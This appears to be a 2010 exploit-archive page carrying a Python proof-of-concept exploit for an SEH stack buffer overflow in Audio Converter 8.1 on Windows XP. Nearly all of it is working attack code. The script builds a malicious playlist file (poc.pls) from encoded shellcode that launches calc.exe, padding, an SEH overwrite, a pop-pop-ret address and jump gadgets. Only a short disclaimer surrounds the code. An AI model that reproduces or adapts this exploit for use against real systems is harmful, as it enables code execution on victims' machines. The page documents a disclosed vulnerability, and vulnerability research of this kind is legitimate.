Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit
Posted on 07 June 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================================== Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ========================================================== #*********************************************************************************** # Exploit Title : Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit # Date : 16/05/2010 # Author : Sud0 # Bug found by : chap0 # Software Link : http://download.cnet.com/Audio-Converter/3000-2140_4-10045287.html # Version : 8.1 # OS : Windows # Tested on : XP SP3 En (VirtualBox) # Type of vuln : SEH # Thanks to my wife for her support # Thanks for chap0 for bringing us the game # Greetz to: Corelan Security Team # http://www.corelan.be:8800/index.php/security/corelan-team-members/ #~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ # Script provided 'as is', without any warranty. # Use for educational purposes only. # Do not use this code to do anything illegal ! # Corelan does not want anyone to use this script # for malicious and/or illegal purposes # Corelan cannot be held responsible for any illegal use. # # Note : you are not allowed to edit/modify this code. # If you do, Corelan cannot be held responsible for any damages this may cause. #*********************************************************************************** #code : print "|------------------------------------------------------------------| "; print "| __ __ | "; print "| _________ ________ / /___ _____ / /____ ____ _____ ___ | "; print "| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ | "; print "| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / | "; print "| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ | "; print "| | "; print "| http://www.corelan.be:8800 | "; print "| | "; print "|-------------------------------------------------[ EIP Hunters ]--| "; print "[+] Exploit for .... "; import socket #shellcode running calc.exe alpha2 encoded basereg edx shell="JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIlKXlpUnkxlqx7P7PQ0fOrHpcparLQsLMaUzXPPNXKwOcxBCGKOZpA" junk="B" * (4432 - len(shell)) #seh overwritten after 4432 bytes nseh= "xEBx06xEBx06" # jmp forward seh= "xF1x8Ex03x10" # nice ppr from audioconv align="x61x61x61xffxE2" # popad / popad / popad / jmp edx buffer= shell + junk + nseh + seh + "x90" * 20 + align + "A"* 10000# added some nops after seh mefile = open('poc.pls','w'); mefile.write(buffer); mefile.close() # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
